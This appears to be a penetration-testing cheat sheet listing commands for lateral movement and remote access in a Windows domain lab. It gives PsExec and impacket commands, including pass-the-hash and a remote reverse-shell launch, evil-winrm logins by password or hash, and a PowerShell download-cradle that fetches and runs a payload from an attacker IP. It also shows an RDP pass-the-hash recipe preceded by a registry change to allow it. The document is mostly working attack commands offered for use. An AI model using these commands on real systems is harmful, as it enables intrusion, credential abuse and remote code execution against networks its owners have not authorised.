Remote Access

PsExec64

  • Local SYSTEM

paexec.exe -s -i cmd

  • Remote Login

.\PsExec64.exe -accepteula \\file01.domain.COM C:\reverse-shell.exe

psexec

python3 impacket/examples/psexec.py -hashes :052e763020c5da81d4085a05e69b0f1b [RED/]pete@192.168.y.z

python3 impacket/examples/psexec.py -k -no-pass da@reddc.red.com cmd

WinRM

evil-winrm -i 172.16.y.z -u [red.com\\]jim -p Passw0rd

evil-winrm -i 192.168.y.z -u kevin -H [hash]

invoke-command -computername redwebaw.red.com -scriptblock {cmd /c "powershell -exec bypass -nop iex (new-object net.webclient).downloadstring('http://192.168.x.y/runner64.txt')"}

RDP

  • Password Authentication

xfreerdp /u:Administrator /p:lab [/d:red.com] /cert:ignore /v:192.168.y.z /dynamic-resolution

  • PTH

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

xfreerdp /v:192.168.y.z /u:bill /pth:[hash] /d:red.com /dynamic-resolution
